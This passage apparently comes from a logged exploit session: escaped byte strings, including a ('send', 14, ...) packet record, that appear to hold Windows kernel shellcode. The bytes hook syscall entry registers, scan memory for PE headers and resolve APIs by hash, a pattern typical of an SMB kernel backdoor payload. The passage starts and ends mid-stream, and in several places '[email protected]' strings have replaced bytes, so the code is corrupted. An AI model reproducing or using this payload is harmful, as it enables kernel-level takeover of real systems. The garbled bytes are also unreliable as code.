\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 14, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0